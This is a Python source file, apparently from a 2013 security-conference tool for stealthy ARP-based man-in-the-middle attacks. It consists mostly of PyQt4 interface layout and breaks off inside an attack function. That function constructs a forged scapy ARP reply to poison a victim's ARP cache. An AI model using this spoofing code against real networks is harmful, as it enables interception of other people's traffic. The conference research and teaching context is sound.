#############################################################
#      NullCon'13 Goa International Security Conference     #
#							    #
#	       ReSt: The REal STealth MITM Tool 	    #
#							    #
#               Copyright (c) 2013 Naga Rohit S             #
#							    #
#     Please find the license agreement of the software     #
#        in the current folder in the file LICENSE.md	    #
#############################################################

# -*- coding: utf-8 -*-

# Form implementation generated from reading ui file 'interface.ui'
#
# Created: Wed Feb 13 12:22:56 2013
#      by: PyQt4 UI code generator 4.8.3
#
# WARNING! All changes made in this file will be lost!

from PyQt4 import QtCore, QtGui
import time
import sys
from scapy.all import *

try:
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    _fromUtf8 = lambda s: s

class Ui_widget(object):
    def setupUi(self, widget):
    
    	self.genericThread = None #Initializing the genericThread variable
    	
        widget.setObjectName(_fromUtf8("widget"))
        widget.resize(396, 510)
        self.label = QtGui.QLabel(widget)
        self.label.setGeometry(QtCore.QRect(32, 15, 61, 31))
        font = QtGui.QFont()
        font.setPointSize(9)
        font.setWeight(75)
        font.setBold(True)
        self.label.setFont(font)
        self.label.setObjectName(_fromUtf8("label"))
        self.lineEdit = QtGui.QLineEdit(widget)
        self.lineEdit.setGeometry(QtCore.QRect(90, 15, 51, 31))
        font = QtGui.QFont()
        font.setWeight(50)
        font.setBold(False)
        self.lineEdit.setFont(font)
        self.lineEdit.setInputMethodHints(QtCore.Qt.ImhDigitsOnly)
        self.lineEdit.setMaxLength(3)
        self.lineEdit.setObjectName(_fromUtf8("lineEdit"))
        self.label_2 = QtGui.QLabel(widget)
        self.label_2.setGeometry(QtCore.QRect(16, 56, 81, 31))
        font = QtGui.QFont()
        font.setPointSize(9)
        font.setWeight(75)
        font.setBold(True)
        self.label_2.setFont(font)
        self.label_2.setObjectName(_fromUtf8("label_2"))
        self.lineEdit_2 = QtGui.QLineEdit(widget)
        self.lineEdit_2.setGeometry(QtCore.QRect(150, 15, 51, 31))
        self.lineEdit_2.setInputMethodHints(QtCore.Qt.ImhDigitsOnly)
        self.lineEdit_2.setMaxLength(3)
        self.lineEdit_2.setObjectName(_fromUtf8("lineEdit_2"))
        self.lineEdit_3 = QtGui.QLineEdit(widget)
        self.lineEdit_3.setGeometry(QtCore.QRect(210, 15, 51, 31))
        self.lineEdit_3.setInputMethodHints(QtCore.Qt.ImhDigitsOnly)
        self.lineEdit_3.setMaxLength(3)
        self.lineEdit_3.setObjectName(_fromUtf8("lineEdit_3"))
        self.lineEdit_4 = QtGui.QLineEdit(widget)
        self.lineEdit_4.setGeometry(QtCore.QRect(270, 15, 51, 31))
        self.lineEdit_4.setInputMethodHints(QtCore.Qt.ImhDigitsOnly)
        self.lineEdit_4.setMaxLength(3)
        self.lineEdit_4.setObjectName(_fromUtf8("lineEdit_4"))
        self.lineEdit_5 = QtGui.QLineEdit(widget)
        self.lineEdit_5.setGeometry(QtCore.QRect(90, 55, 41, 31))
        self.lineEdit_5.setInputMethodHints(QtCore.Qt.ImhPreferLowercase)
        self.lineEdit_5.setMaxLength(2)
        self.lineEdit_5.setObjectName(_fromUtf8("lineEdit_5"))
        self.lineEdit_6 = QtGui.QLineEdit(widget)
        self.lineEdit_6.setGeometry(QtCore.QRect(140, 55, 41, 31))
        self.lineEdit_6.setInputMethodHints(QtCore.Qt.ImhPreferLowercase)
        self.lineEdit_6.setMaxLength(2)
        self.lineEdit_6.setObjectName(_fromUtf8("lineEdit_6"))
        self.lineEdit_7 = QtGui.QLineEdit(widget)
        self.lineEdit_7.setGeometry(QtCore.QRect(190, 55, 41, 31))
        self.lineEdit_7.setInputMethodHints(QtCore.Qt.ImhPreferLowercase)
        self.lineEdit_7.setMaxLength(2)
        self.lineEdit_7.setObjectName(_fromUtf8("lineEdit_7"))
        self.lineEdit_8 = QtGui.QLineEdit(widget)
        self.lineEdit_8.setGeometry(QtCore.QRect(240, 55, 41, 31))
        self.lineEdit_8.setInputMethodHints(QtCore.Qt.ImhPreferLowercase)
        self.lineEdit_8.setMaxLength(2)
        self.lineEdit_8.setObjectName(_fromUtf8("lineEdit_8"))
        self.lineEdit_9 = QtGui.QLineEdit(widget)
        self.lineEdit_9.setGeometry(QtCore.QRect(290, 55, 41, 31))
        self.lineEdit_9.setInputMethodHints(QtCore.Qt.ImhPreferLowercase)
        self.lineEdit_9.setMaxLength(2)
        self.lineEdit_9.setObjectName(_fromUtf8("lineEdit_9"))
        self.lineEdit_10 = QtGui.QLineEdit(widget)
        self.lineEdit_10.setGeometry(QtCore.QRect(340, 55, 41, 31))
        self.lineEdit_10.setInputMethodHints(QtCore.Qt.ImhPreferLowercase)
        self.lineEdit_10.setMaxLength(2)
        self.lineEdit_10.setObjectName(_fromUtf8("lineEdit_10"))
        self.label_3 = QtGui.QLabel(widget)
        self.label_3.setGeometry(QtCore.QRect(132, 61, 16, 21))
        font = QtGui.QFont()
        font.setPointSize(12)
        font.setWeight(75)
        font.setBold(True)
        self.label_3.setFont(font)
        self.label_3.setObjectName(_fromUtf8("label_3"))
        self.label_4 = QtGui.QLabel(widget)
        self.label_4.setGeometry(QtCore.QRect(182, 61, 16, 21))
        font = QtGui.QFont()
        font.setPointSize(12)
        font.setWeight(75)
        font.setBold(True)
        self.label_4.setFont(font)
        self.label_4.setObjectName(_fromUtf8("label_4"))
        self.label_5 = QtGui.QLabel(widget)
        self.label_5.setGeometry(QtCore.QRect(232, 59, 16, 21))
        font = QtGui.QFont()
        font.setPointSize(12)
        font.setWeight(75)
        font.setBold(True)
        self.label_5.setFont(font)
        self.label_5.setObjectName(_fromUtf8("label_5"))
        self.label_6 = QtGui.QLabel(widget)
        self.label_6.setGeometry(QtCore.QRect(283, 59, 16, 21))
        font = QtGui.QFont()
        font.setPointSize(12)
        font.setWeight(75)
        font.setBold(True)
        self.label_6.setFont(font)
        self.label_6.setObjectName(_fromUtf8("label_6"))
        self.label_7 = QtGui.QLabel(widget)
        self.label_7.setGeometry(QtCore.QRect(332, 59, 16, 21))
        font = QtGui.QFont()
        font.setPointSize(12)
        font.setWeight(75)
        font.setBold(True)
        self.label_7.setFont(font)
        self.label_7.setObjectName(_fromUtf8("label_7"))
        self.label_8 = QtGui.QLabel(widget)
        self.label_8.setGeometry(QtCore.QRect(143, 27, 16, 17))
        font = QtGui.QFont()
        font.setPointSize(13)
        font.setWeight(75)
        font.setBold(True)
        self.label_8.setFont(font)
        self.label_8.setObjectName(_fromUtf8("label_8"))
        self.label_9 = QtGui.QLabel(widget)
        self.label_9.setGeometry(QtCore.QRect(202, 27, 16, 17))
        font = QtGui.QFont()
        font.setPointSize(13)
        font.setWeight(75)
        font.setBold(True)
        self.label_9.setFont(font)
        self.label_9.setObjectName(_fromUtf8("label_9"))
        self.label_10 = QtGui.QLabel(widget)
        self.label_10.setGeometry(QtCore.QRect(262, 26, 16, 17))
        font = QtGui.QFont()
        font.setPointSize(13)
        font.setWeight(75)
        font.setBold(True)
        self.label_10.setFont(font)
        self.label_10.setObjectName(_fromUtf8("label_10"))
        self.lineEdit_11 = QtGui.QLineEdit(widget)
        self.lineEdit_11.setGeometry(QtCore.QRect(190, 162, 41, 31))
        self.lineEdit_11.setInputMethodHints(QtCore.Qt.ImhPreferLowercase)
        self.lineEdit_11.setMaxLength(2)
        self.lineEdit_11.setObjectName(_fromUtf8("lineEdit_11"))
        self.label_11 = QtGui.QLabel(widget)
        self.label_11.setGeometry(QtCore.QRect(22, 162, 81, 31))
        font = QtGui.QFont()
        font.setPointSize(9)
        font.setWeight(75)
        font.setBold(True)
        self.label_11.setFont(font)
        self.label_11.setObjectName(_fromUtf8("label_11"))
        self.label_12 = QtGui.QLabel(widget)
        self.label_12.setGeometry(QtCore.QRect(283, 166, 16, 21))
        font = QtGui.QFont()
        font.setPointSize(12)
        font.setWeight(75)
        font.setBold(True)
        self.label_12.setFont(font)
        self.label_12.setObjectName(_fromUtf8("label_12"))
        self.lineEdit_12 = QtGui.QLineEdit(widget)
        self.lineEdit_12.setGeometry(QtCore.QRect(210, 122, 51, 31))
        self.lineEdit_12.setInputMethodHints(QtCore.Qt.ImhDigitsOnly)
        self.lineEdit_12.setMaxLength(3)
        self.lineEdit_12.setObjectName(_fromUtf8("lineEdit_12"))
        self.lineEdit_13 = QtGui.QLineEdit(widget)
        self.lineEdit_13.setGeometry(QtCore.QRect(290, 162, 41, 31))
        self.lineEdit_13.setInputMethodHints(QtCore.Qt.ImhPreferLowercase)
        self.lineEdit_13.setMaxLength(2)
        self.lineEdit_13.setObjectName(_fromUtf8("lineEdit_13"))
        self.lineEdit_14 = QtGui.QLineEdit(widget)
        self.lineEdit_14.setGeometry(QtCore.QRect(90, 162, 41, 31))
        self.lineEdit_14.setInputMethodHints(QtCore.Qt.ImhPreferLowercase)
        self.lineEdit_14.setMaxLength(2)
        self.lineEdit_14.setObjectName(_fromUtf8("lineEdit_14"))
        self.label_13 = QtGui.QLabel(widget)
        self.label_13.setGeometry(QtCore.QRect(182, 168, 16, 21))
        font = QtGui.QFont()
        font.setPointSize(12)
        font.setWeight(75)
        font.setBold(True)
        self.label_13.setFont(font)
        self.label_13.setObjectName(_fromUtf8("label_13"))
        self.lineEdit_15 = QtGui.QLineEdit(widget)
        self.lineEdit_15.setGeometry(QtCore.QRect(240, 162, 41, 31))
        self.lineEdit_15.setInputMethodHints(QtCore.Qt.ImhPreferLowercase)
        self.lineEdit_15.setMaxLength(2)
        self.lineEdit_15.setObjectName(_fromUtf8("lineEdit_15"))
        self.label_14 = QtGui.QLabel(widget)
        self.label_14.setGeometry(QtCore.QRect(332, 166, 16, 21))
        font = QtGui.QFont()
        font.setPointSize(12)
        font.setWeight(75)
        font.setBold(True)
        self.label_14.setFont(font)
        self.label_14.setObjectName(_fromUtf8("label_14"))
        self.label_15 = QtGui.QLabel(widget)
        self.label_15.setGeometry(QtCore.QRect(202, 134, 16, 17))
        font = QtGui.QFont()
        font.setPointSize(13)
        font.setWeight(75)
        font.setBold(True)
        self.label_15.setFont(font)
        self.label_15.setObjectName(_fromUtf8("label_15"))
        self.lineEdit_16 = QtGui.QLineEdit(widget)
        self.lineEdit_16.setGeometry(QtCore.QRect(90, 122, 51, 31))
        self.lineEdit_16.setInputMethodHints(QtCore.Qt.ImhDigitsOnly)
        self.lineEdit_16.setMaxLength(3)
        self.lineEdit_16.setObjectName(_fromUtf8("lineEdit_16"))
        self.label_16 = QtGui.QLabel(widget)
        self.label_16.setGeometry(QtCore.QRect(38, 122, 61, 31))
        font = QtGui.QFont()
        font.setPointSize(9)
        font.setWeight(75)
        font.setBold(True)
        self.label_16.setFont(font)
        self.label_16.setObjectName(_fromUtf8("label_16"))
        self.lineEdit_17 = QtGui.QLineEdit(widget)
        self.lineEdit_17.setGeometry(QtCore.QRect(140, 162, 41, 31))
        self.lineEdit_17.setInputMethodHints(QtCore.Qt.ImhPreferLowercase)
        self.lineEdit_17.setMaxLength(2)
        self.lineEdit_17.setObjectName(_fromUtf8("lineEdit_17"))
        self.label_17 = QtGui.QLabel(widget)
        self.label_17.setGeometry(QtCore.QRect(232, 166, 16, 21))
        font = QtGui.QFont()
        font.setPointSize(12)
        font.setWeight(75)
        font.setBold(True)
        self.label_17.setFont(font)
        self.label_17.setObjectName(_fromUtf8("label_17"))
        self.label_18 = QtGui.QLabel(widget)
        self.label_18.setGeometry(QtCore.QRect(143, 134, 16, 17))
        font = QtGui.QFont()
        font.setPointSize(13)
        font.setWeight(75)
        font.setBold(True)
        self.label_18.setFont(font)
        self.label_18.setObjectName(_fromUtf8("label_18"))
        self.lineEdit_18 = QtGui.QLineEdit(widget)
        self.lineEdit_18.setGeometry(QtCore.QRect(340, 162, 41, 31))
        self.lineEdit_18.setInputMethodHints(QtCore.Qt.ImhPreferLowercase)
        self.lineEdit_18.setMaxLength(2)
        self.lineEdit_18.setObjectName(_fromUtf8("lineEdit_18"))
        self.lineEdit_19 = QtGui.QLineEdit(widget)
        self.lineEdit_19.setGeometry(QtCore.QRect(150, 122, 51, 31))
        self.lineEdit_19.setInputMethodHints(QtCore.Qt.ImhDigitsOnly)
        self.lineEdit_19.setMaxLength(3)
        self.lineEdit_19.setObjectName(_fromUtf8("lineEdit_19"))
        self.lineEdit_20 = QtGui.QLineEdit(widget)
        self.lineEdit_20.setGeometry(QtCore.QRect(270, 122, 51, 31))
        self.lineEdit_20.setInputMethodHints(QtCore.Qt.ImhDigitsOnly)
        self.lineEdit_20.setMaxLength(3)
        self.lineEdit_20.setObjectName(_fromUtf8("lineEdit_20"))
        self.label_19 = QtGui.QLabel(widget)
        self.label_19.setGeometry(QtCore.QRect(262, 134, 16, 17))
        font = QtGui.QFont()
        font.setPointSize(13)
        font.setWeight(75)
        font.setBold(True)
        self.label_19.setFont(font)
        self.label_19.setObjectName(_fromUtf8("label_19"))
        self.label_20 = QtGui.QLabel(widget)
        self.label_20.setGeometry(QtCore.QRect(132, 168, 16, 21))
        font = QtGui.QFont()
        font.setPointSize(12)
        font.setWeight(75)
        font.setBold(True)
        self.label_20.setFont(font)
        self.label_20.setObjectName(_fromUtf8("label_20"))
        self.radioButton = QtGui.QRadioButton(widget)
        self.radioButton.setGeometry(QtCore.QRect(128, 318, 121, 21))
        font = QtGui.QFont()
        font.setWeight(75)
        font.setBold(True)
        self.radioButton.setFont(font)
        self.radioButton.setChecked(True)
        self.radioButton.setObjectName(_fromUtf8("radioButton"))
        self.radioButton_2 = QtGui.QRadioButton(widget)
        self.radioButton_2.setGeometry(QtCore.QRect(128, 354, 151, 21))
        font = QtGui.QFont()
        font.setWeight(75)
        font.setBold(True)
        self.radioButton_2.setFont(font)
        self.radioButton_2.setChecked(False)
        self.radioButton_2.setObjectName(_fromUtf8("radioButton_2"))
        self.label_21 = QtGui.QLabel(widget)
        self.label_21.setGeometry(QtCore.QRect(28, 348, 81, 31))
        font = QtGui.QFont()
        font.setPointSize(9)
        font.setWeight(75)
        font.setBold(True)
        self.label_21.setFont(font)
        self.label_21.setObjectName(_fromUtf8("label_21"))
        self.pushButton = QtGui.QPushButton(widget)
        self.pushButton.setGeometry(QtCore.QRect(10, 438, 111, 61))
        self.pushButton.setObjectName(_fromUtf8("pushButton"))
        self.pushButton_2 = QtGui.QPushButton(widget)
        self.pushButton_2.setGeometry(QtCore.QRect(140, 438, 111, 61))
        self.pushButton_2.setObjectName(_fromUtf8("pushButton_2"))
        self.pushButton_3 = QtGui.QPushButton(widget)
        self.pushButton_3.setGeometry(QtCore.QRect(270, 438, 111, 61))
        self.pushButton_3.setObjectName(_fromUtf8("pushButton_3"))
        self.label_22 = QtGui.QLabel(widget)
        self.label_22.setGeometry(QtCore.QRect(154, 368, 111, 21))
        font = QtGui.QFont()
        font.setPointSize(7)
        self.label_22.setFont(font)
        self.label_22.setObjectName(_fromUtf8("label_22"))
        self.radioButton_3 = QtGui.QRadioButton(widget)
        self.radioButton_3.setGeometry(QtCore.QRect(128, 390, 151, 21))
        font = QtGui.QFont()
        font.setWeight(75)
        font.setBold(True)
        self.radioButton_3.setFont(font)
        self.radioButton_3.setObjectName(_fromUtf8("radioButton_3"))
        self.label_23 = QtGui.QLabel(widget)
        self.label_23.setGeometry(QtCore.QRect(152, 404, 111, 21))
        font = QtGui.QFont()
        font.setPointSize(7)
        self.label_23.setFont(font)
        self.label_23.setObjectName(_fromUtf8("label_23"))
        self.lineEdit_21 = QtGui.QLineEdit(widget)
        self.lineEdit_21.setGeometry(QtCore.QRect(290, 266, 41, 31))
        self.lineEdit_21.setInputMethodHints(QtCore.Qt.ImhPreferLowercase)
        self.lineEdit_21.setMaxLength(2)
        self.lineEdit_21.setObjectName(_fromUtf8("lineEdit_21"))
        self.label_27 = QtGui.QLabel(widget)
        self.label_27.setGeometry(QtCore.QRect(232, 270, 16, 21))
        font = QtGui.QFont()
        font.setPointSize(12)
        font.setWeight(75)
        font.setBold(True)
        self.label_27.setFont(font)
        self.label_27.setObjectName(_fromUtf8("label_27"))
        self.label_28 = QtGui.QLabel(widget)
        self.label_28.setGeometry(QtCore.QRect(143, 238, 16, 17))
        font = QtGui.QFont()
        font.setPointSize(13)
        font.setWeight(75)
        font.setBold(True)
        self.label_28.setFont(font)
        self.label_28.setObjectName(_fromUtf8("label_28"))
        self.label_29 = QtGui.QLabel(widget)
        self.label_29.setGeometry(QtCore.QRect(30, 268, 81, 31))
        font = QtGui.QFont()
        font.setPointSize(9)
        font.setWeight(75)
        font.setBold(True)
        self.label_29.setFont(font)
        self.label_29.setObjectName(_fromUtf8("label_29"))
        self.label_30 = QtGui.QLabel(widget)
        self.label_30.setGeometry(QtCore.QRect(202, 238, 16, 17))
        font = QtGui.QFont()
        font.setPointSize(13)
        font.setWeight(75)
        font.setBold(True)
        self.label_30.setFont(font)
        self.label_30.setObjectName(_fromUtf8("label_30"))
        self.lineEdit_22 = QtGui.QLineEdit(widget)
        self.lineEdit_22.setGeometry(QtCore.QRect(240, 266, 41, 31))
        self.lineEdit_22.setInputMethodHints(QtCore.Qt.ImhPreferLowercase)
        self.lineEdit_22.setMaxLength(2)
        self.lineEdit_22.setObjectName(_fromUtf8("lineEdit_22"))
        self.label_31 = QtGui.QLabel(widget)
        self.label_31.setGeometry(QtCore.QRect(332, 270, 16, 21))
        font = QtGui.QFont()
        font.setPointSize(12)
        font.setWeight(75)
        font.setBold(True)
        self.label_31.setFont(font)
        self.label_31.setObjectName(_fromUtf8("label_31"))
        self.label_32 = QtGui.QLabel(widget)
        self.label_32.setGeometry(QtCore.QRect(46, 226, 61, 31))
        font = QtGui.QFont()
        font.setPointSize(9)
        font.setWeight(75)
        font.setBold(True)
        self.label_32.setFont(font)
        self.label_32.setObjectName(_fromUtf8("label_32"))
        self.label_33 = QtGui.QLabel(widget)
        self.label_33.setGeometry(QtCore.QRect(182, 272, 16, 21))
        font = QtGui.QFont()
        font.setPointSize(12)
        font.setWeight(75)
        font.setBold(True)
        self.label_33.setFont(font)
        self.label_33.setObjectName(_fromUtf8("label_33"))
        self.lineEdit_23 = QtGui.QLineEdit(widget)
        self.lineEdit_23.setGeometry(QtCore.QRect(270, 226, 51, 31))
        self.lineEdit_23.setInputMethodHints(QtCore.Qt.ImhDigitsOnly)
        self.lineEdit_23.setMaxLength(3)
        self.lineEdit_23.setObjectName(_fromUtf8("lineEdit_23"))
        self.lineEdit_24 = QtGui.QLineEdit(widget)
        self.lineEdit_24.setGeometry(QtCore.QRect(150, 226, 51, 31))
        self.lineEdit_24.setInputMethodHints(QtCore.Qt.ImhDigitsOnly)
        self.lineEdit_24.setMaxLength(3)
        self.lineEdit_24.setObjectName(_fromUtf8("lineEdit_24"))
        self.label_34 = QtGui.QLabel(widget)
        self.label_34.setGeometry(QtCore.QRect(283, 270, 16, 21))
        font = QtGui.QFont()
        font.setPointSize(12)
        font.setWeight(75)
        font.setBold(True)
        self.label_34.setFont(font)
        self.label_34.setObjectName(_fromUtf8("label_34"))
        self.lineEdit_25 = QtGui.QLineEdit(widget)
        self.lineEdit_25.setGeometry(QtCore.QRect(90, 226, 51, 31))
        font = QtGui.QFont()
        font.setWeight(50)
        font.setBold(False)
        self.lineEdit_25.setFont(font)
        self.lineEdit_25.setInputMethodHints(QtCore.Qt.ImhDigitsOnly)
        self.lineEdit_25.setMaxLength(3)
        self.lineEdit_25.setObjectName(_fromUtf8("lineEdit_25"))
        self.lineEdit_26 = QtGui.QLineEdit(widget)
        self.lineEdit_26.setGeometry(QtCore.QRect(190, 266, 41, 31))
        self.lineEdit_26.setInputMethodHints(QtCore.Qt.ImhPreferLowercase)
        self.lineEdit_26.setMaxLength(2)
        self.lineEdit_26.setObjectName(_fromUtf8("lineEdit_26"))
        self.lineEdit_27 = QtGui.QLineEdit(widget)
        self.lineEdit_27.setGeometry(QtCore.QRect(210, 226, 51, 31))
        self.lineEdit_27.setInputMethodHints(QtCore.Qt.ImhDigitsOnly)
        self.lineEdit_27.setMaxLength(3)
        self.lineEdit_27.setObjectName(_fromUtf8("lineEdit_27"))
        self.lineEdit_28 = QtGui.QLineEdit(widget)
        self.lineEdit_28.setGeometry(QtCore.QRect(90, 266, 41, 31))
        self.lineEdit_28.setInputMethodHints(QtCore.Qt.ImhPreferLowercase)
        self.lineEdit_28.setMaxLength(2)
        self.lineEdit_28.setObjectName(_fromUtf8("lineEdit_28"))
        self.label_35 = QtGui.QLabel(widget)
        self.label_35.setGeometry(QtCore.QRect(262, 237, 16, 17))
        font = QtGui.QFont()
        font.setPointSize(13)
        font.setWeight(75)
        font.setBold(True)
        self.label_35.setFont(font)
        self.label_35.setObjectName(_fromUtf8("label_35"))
        self.lineEdit_29 = QtGui.QLineEdit(widget)
        self.lineEdit_29.setGeometry(QtCore.QRect(340, 266, 41, 31))
        self.lineEdit_29.setInputMethodHints(QtCore.Qt.ImhPreferLowercase)
        self.lineEdit_29.setMaxLength(2)
        self.lineEdit_29.setObjectName(_fromUtf8("lineEdit_29"))
        self.lineEdit_30 = QtGui.QLineEdit(widget)
        self.lineEdit_30.setGeometry(QtCore.QRect(140, 266, 41, 31))
        self.lineEdit_30.setInputMethodHints(QtCore.Qt.ImhPreferLowercase)
        self.lineEdit_30.setMaxLength(2)
        self.lineEdit_30.setObjectName(_fromUtf8("lineEdit_30"))
        self.label_36 = QtGui.QLabel(widget)
        self.label_36.setGeometry(QtCore.QRect(132, 272, 16, 21))
        font = QtGui.QFont()
        font.setPointSize(12)
        font.setWeight(75)
        font.setBold(True)
        self.label_36.setFont(font)
        self.label_36.setObjectName(_fromUtf8("label_36"))
        self.label_24 = QtGui.QLabel(widget)
        self.label_24.setGeometry(QtCore.QRect(312, 352, 45, 16))
        font = QtGui.QFont()
        font.setFamily(_fromUtf8("Bitstream Charter"))
        font.setPointSize(7)
        font.setWeight(75)
        font.setItalic(False)
        font.setBold(True)
        self.label_24.setFont(font)
        self.label_24.setObjectName(_fromUtf8("label_24"))
        self.label_25 = QtGui.QLabel(widget)
        self.label_25.setGeometry(QtCore.QRect(296, 364, 85, 15))
        font = QtGui.QFont()
        font.setPointSize(7)
        font.setWeight(75)
        font.setItalic(False)
        font.setBold(True)
        self.label_25.setFont(font)
        self.label_25.setObjectName(_fromUtf8("label_25"))

        self.retranslateUi(widget)
        QtCore.QObject.connect(self.pushButton, QtCore.SIGNAL(_fromUtf8("clicked()")), self.launchAttack)
        QtCore.QObject.connect(self.pushButton_2, QtCore.SIGNAL(_fromUtf8("clicked()")), self.stopAttack)
        QtCore.QObject.connect(self.pushButton_3, QtCore.SIGNAL(_fromUtf8("clicked()")), self.undoAttack)
        QtCore.QMetaObject.connectSlotsByName(widget)
        widget.setTabOrder(self.lineEdit, self.lineEdit_2)
        widget.setTabOrder(self.lineEdit_2, self.lineEdit_3)
        widget.setTabOrder(self.lineEdit_3, self.lineEdit_4)
        widget.setTabOrder(self.lineEdit_4, self.lineEdit_5)
        widget.setTabOrder(self.lineEdit_5, self.lineEdit_6)
        widget.setTabOrder(self.lineEdit_6, self.lineEdit_7)
        widget.setTabOrder(self.lineEdit_7, self.lineEdit_8)
        widget.setTabOrder(self.lineEdit_8, self.lineEdit_9)
        widget.setTabOrder(self.lineEdit_9, self.lineEdit_10)
        widget.setTabOrder(self.lineEdit_10, self.lineEdit_16)
        widget.setTabOrder(self.lineEdit_16, self.lineEdit_19)
        widget.setTabOrder(self.lineEdit_19, self.lineEdit_12)
        widget.setTabOrder(self.lineEdit_12, self.lineEdit_20)
        widget.setTabOrder(self.lineEdit_20, self.lineEdit_14)
        widget.setTabOrder(self.lineEdit_14, self.lineEdit_17)
        widget.setTabOrder(self.lineEdit_17, self.lineEdit_11)
        widget.setTabOrder(self.lineEdit_11, self.lineEdit_15)
        widget.setTabOrder(self.lineEdit_15, self.lineEdit_13)
        widget.setTabOrder(self.lineEdit_13, self.lineEdit_18)
        widget.setTabOrder(self.lineEdit_18, self.lineEdit_25)
        widget.setTabOrder(self.lineEdit_25, self.lineEdit_24)
        widget.setTabOrder(self.lineEdit_24, self.lineEdit_27)
        widget.setTabOrder(self.lineEdit_27, self.lineEdit_23)
        widget.setTabOrder(self.lineEdit_23, self.lineEdit_28)
        widget.setTabOrder(self.lineEdit_28, self.lineEdit_30)
        widget.setTabOrder(self.lineEdit_30, self.lineEdit_26)
        widget.setTabOrder(self.lineEdit_26, self.lineEdit_22)
        widget.setTabOrder(self.lineEdit_22, self.lineEdit_21)
        widget.setTabOrder(self.lineEdit_21, self.lineEdit_29)
        widget.setTabOrder(self.lineEdit_29, self.radioButton)
        widget.setTabOrder(self.radioButton, self.radioButton_2)
        widget.setTabOrder(self.radioButton_2, self.radioButton_3)
        widget.setTabOrder(self.radioButton_3, self.pushButton)
        widget.setTabOrder(self.pushButton, self.pushButton_2)
        widget.setTabOrder(self.pushButton_2, self.pushButton_3)

    def retranslateUi(self, widget):
        widget.setWindowTitle(QtGui.QApplication.translate("widget", "ReSt: The Real Stealth MITM", None, QtGui.QApplication.UnicodeUTF8))
        self.label.setText(QtGui.QApplication.translate("widget", "Alice IP", None, QtGui.QApplication.UnicodeUTF8))
        self.label_2.setText(QtGui.QApplication.translate("widget", "Alice MAC", None, QtGui.QApplication.UnicodeUTF8))
        self.label_3.setText(QtGui.QApplication.translate("widget", ":", None, QtGui.QApplication.UnicodeUTF8))
        self.label_4.setText(QtGui.QApplication.translate("widget", ":", None, QtGui.QApplication.UnicodeUTF8))
        self.label_5.setText(QtGui.QApplication.translate("widget", ":", None, QtGui.QApplication.UnicodeUTF8))
        self.label_6.setText(QtGui.QApplication.translate("widget", ":", None, QtGui.QApplication.UnicodeUTF8))
        self.label_7.setText(QtGui.QApplication.translate("widget", ":", None, QtGui.QApplication.UnicodeUTF8))
        self.label_8.setText(QtGui.QApplication.translate("widget", ".", None, QtGui.QApplication.UnicodeUTF8))
        self.label_9.setText(QtGui.QApplication.translate("widget", ".", None, QtGui.QApplication.UnicodeUTF8))
        self.label_10.setText(QtGui.QApplication.translate("widget", ".", None, QtGui.QApplication.UnicodeUTF8))
        self.label_11.setText(QtGui.QApplication.translate("widget", "Bob MAC", None, QtGui.QApplication.UnicodeUTF8))
        self.label_12.setText(QtGui.QApplication.translate("widget", ":", None, QtGui.QApplication.UnicodeUTF8))
        self.label_13.setText(QtGui.QApplication.translate("widget", ":", None, QtGui.QApplication.UnicodeUTF8))
        self.label_14.setText(QtGui.QApplication.translate("widget", ":", None, QtGui.QApplication.UnicodeUTF8))
        self.label_15.setText(QtGui.QApplication.translate("widget", ".", None, QtGui.QApplication.UnicodeUTF8))
        self.label_16.setText(QtGui.QApplication.translate("widget", "Bob IP", None, QtGui.QApplication.UnicodeUTF8))
        self.label_17.setText(QtGui.QApplication.translate("widget", ":", None, QtGui.QApplication.UnicodeUTF8))
        self.label_18.setText(QtGui.QApplication.translate("widget", ".", None, QtGui.QApplication.UnicodeUTF8))
        self.label_19.setText(QtGui.QApplication.translate("widget", ".", None, QtGui.QApplication.UnicodeUTF8))
        self.label_20.setText(QtGui.QApplication.translate("widget", ":", None, QtGui.QApplication.UnicodeUTF8))
        self.radioButton.setText(QtGui.QApplication.translate("widget", "Stealth", None, QtGui.QApplication.UnicodeUTF8))
        self.radioButton_2.setText(QtGui.QApplication.translate("widget", "Semi Stealth", None, QtGui.QApplication.UnicodeUTF8))
        self.label_21.setText(QtGui.QApplication.translate("widget", "Attack Type", None, QtGui.QApplication.UnicodeUTF8))
        self.pushButton.setText(QtGui.QApplication.translate("widget", "Launch", None, QtGui.QApplication.UnicodeUTF8))
        self.pushButton_2.setText(QtGui.QApplication.translate("widget", "Stop", None, QtGui.QApplication.UnicodeUTF8))
        self.pushButton_3.setText(QtGui.QApplication.translate("widget", "Undo", None, QtGui.QApplication.UnicodeUTF8))
        self.label_22.setText(QtGui.QApplication.translate("widget", "(Exposed to Bob)", None, QtGui.QApplication.UnicodeUTF8))
        self.radioButton_3.setText(QtGui.QApplication.translate("widget", "Semi Stealth", None, QtGui.QApplication.UnicodeUTF8))
        self.label_23.setText(QtGui.QApplication.translate("widget", "(Exposed to Alice)", None, QtGui.QApplication.UnicodeUTF8))
        self.label_27.setText(QtGui.QApplication.translate("widget", ":", None, QtGui.QApplication.UnicodeUTF8))
        self.label_28.setText(QtGui.QApplication.translate("widget", ".", None, QtGui.QApplication.UnicodeUTF8))
        self.label_29.setText(QtGui.QApplication.translate("widget", "My MAC", None, QtGui.QApplication.UnicodeUTF8))
        self.label_30.setText(QtGui.QApplication.translate("widget", ".", None, QtGui.QApplication.UnicodeUTF8))
        self.label_31.setText(QtGui.QApplication.translate("widget", ":", None, QtGui.QApplication.UnicodeUTF8))
        self.label_32.setText(QtGui.QApplication.translate("widget", "My IP", None, QtGui.QApplication.UnicodeUTF8))
        self.label_33.setText(QtGui.QApplication.translate("widget", ":", None, QtGui.QApplication.UnicodeUTF8))
        self.label_34.setText(QtGui.QApplication.translate("widget", ":", None, QtGui.QApplication.UnicodeUTF8))
        self.label_35.setText(QtGui.QApplication.translate("widget", ".", None, QtGui.QApplication.UnicodeUTF8))
        self.label_36.setText(QtGui.QApplication.translate("widget", ":", None, QtGui.QApplication.UnicodeUTF8))
        self.label_24.setText(QtGui.QApplication.translate("widget", "N4G4 R", None, QtGui.QApplication.UnicodeUTF8))
        self.label_25.setText(QtGui.QApplication.translate("widget", "IIT Guwahati", None, QtGui.QApplication.UnicodeUTF8))

    def launchSMITM(self,alice_ip,alice_mac,bob_ip,bob_mac):
    	print "Poisoning via SMITM"
	while True:
		#the broadcast mac address:
		bCast_addr = 'ff:ff:ff:ff:ff:ff'

		#That is, setting Bob's MAC as broadcast in Alice
		pak_bob_as_brdcast_in_alice = Ether(dst=alice_mac,src=bob_mac)/ARP(op=0x0002,hwsrc=bCast_addr,psrc=bob_ip,hwdst=alice_mac,pdst=alice_ip)

		#Setting Alice's MAC as broadcast in Bob
